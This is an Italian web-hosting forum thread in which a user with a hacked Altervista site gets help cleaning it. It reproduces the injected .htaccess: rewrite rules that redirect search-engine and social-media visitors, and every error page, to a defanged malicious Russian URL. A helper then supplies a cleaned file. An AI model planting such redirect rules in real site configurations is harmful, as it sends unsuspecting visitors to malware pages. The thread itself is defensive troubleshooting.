Malfunzionamento account e utilizzazione ridistribuzione malware

[Kodama]

Ciao a tutti, sono ormai da un po' di anni registrato su altervista, e volevo chiedere come risolvere un problema che mi sono accorto oggi di avere... vi spiego, quando sono andato sulla home del mio sito(perchè devo fare un upload per rinnovarlo completamente, quindi guardavo cosa ho messo e come migliorarlo) mi è apparsa una pagina (http://img687.imageshack.us/img687/5410/paginavirus.jpg) dicendomi che il sito porta virus, allora ho provato ad accedere al pannello di controllo ma non riesco ad accedere... aiutooo
(ringrazio in anticipo :) )

[andreafallico]

Accedi via FTP e posta il contenuto del file .htaccess, perchè contiene codice malevolo: http://lab.andrea-fallico.it/htscan/...ltervista.org/

[Kodama]

Accedi via FTP e posta il contenuto del file .htaccess, perchè contiene codice malevolo: http://lab.andrea-fallico.it/htscan/...ltervista.org/

purtroppo non riesco ad accedere neanche via ftp ho già provato, rimane fermo a caricare senza segni di vita...

--------

ci sono riuscito, ecco quello che mi hai chiesto:

Codice:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ h**p://balance-rancho.ru/access/index.php[R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ h**p://balance-rancho.ru/access/index.php[R=301,L]
</IfModule>

# # av:Toolbar
SetEnv AV_TOOLBAR 0

# # av:PHP-RG
php_flag register_globals on
# # av:php5-engine
AddHandler av-php5 .php

ErrorDocument 400 h**p://balance-rancho.ru/access/index.php
ErrorDocument 401 h**p://balance-rancho.ru/access/index.php
ErrorDocument 403 h**p://balance-rancho.ru/access/index.php
ErrorDocument 404 h**p://balance-rancho.ru/access/index.php
ErrorDocument 500 h**p://balance-rancho.ru/access/index.php

[andreafallico]

Sostituiscilo con questo:

Codice:

# # av:Toolbar
SetEnv AV_TOOLBAR 0

# # av:PHP-RG
php_flag register_globals on
# # av:php5-engine
AddHandler av-php5 .php

e poi leggi qui: http://forum.it.altervista.org/726540-post3.html e http://forum.it.altervista.org/759986-post30.html

[Kodama]

scusami la domanda forse sciocca, ma sostituisco tutto il codice del file con quello che mi hai dato tu?
grazie ancora :D

[andreafallico]

Si .

[Kodama]

perfetto funziona tutto, ora faccio una scansione sul pc come mi hai detto e uppo i nuovi file di miglioramento di interfaccia sul sito come volevo fare. Grazie ancora dell'aiuto :D

[Kodama]

ciao, scusami se riposto in questa sezione, ma continuano a entrarmi nell'account(cambiandomi il contenuto di .htaccess). Addirittura altervista mi ha inviato una mail:

Gent. Webmaster,

durante le ultime 24h abbiamo rilevato un flusso anomalo di emails inviate dal tuo sito.
Questo può essere dovuto alla presenza nel tuo spazio web di applicativi (forum, blog, CMS...) affetti da problemi di sicurezza e utilizzati da terze parti per inviare spam.

Al fine di prevenire abusi di servizio l'invio di email dal tuo sito è stato temporaneamente bloccato, il nostro intervento è mirato a tutelare non solo la sicurezza del tuo sito web ma anche quella della comunità stessa di internet, in quanto una porta aperta agli spammers rappresenta un danno per tutti.

Ti preghiamo quindi di:

1) Controllare ed eventualmente aggiornare i tuoi applicativi alle ultime versioni
2) Modificare la password d'accesso al tuo sito e verificare che non sia in possesso di altri
3) Verificare che il tuo PC non sia affetto da virus/worms

L'invio delle email dal tuo sito potrà essere riabilitato cliccando sul link che trovi di seguito.


Ho fatto una scansione del mio pc ma non ho trovato nulla, io uso kaspersky Pure, quindi se dice che non ci sono, vuol dire che non ci sono. Inoltre ho cambiato nuovamente la password, suggerimenti? Ringrazio per la pazienza :)

[Gianluca]

kodama:

dovresti ripulire a fondo il tuo spazio web (ci sono files del 2009), allo stato attuale hai un filemanager nella root del tuo sito (ovviamente non è il caso di postare il link qui), quindi chiunque può modificare i tuoi contenuti.

[comiter]

comiter = clare = elate

non riesco a raggiunger il sito
apparendo errore 403

---------------------------------------

non riesco a raggiungere il link

rimane solo la segnalazione di errore 403

---------------------------------------

solito blocco link con segnalato
errore 403

---------------------------------------

enigmatico errore 403
viene segnalato
e non si riesce ad accedere al sito

spero che situazione evolva positivamente

[dapeco]

enigmatico errore 403
viene segnalato
e non si riesce ad accedere al sito

spero che situazione evolva positivamente

elate, hai seguito quanto su scritto?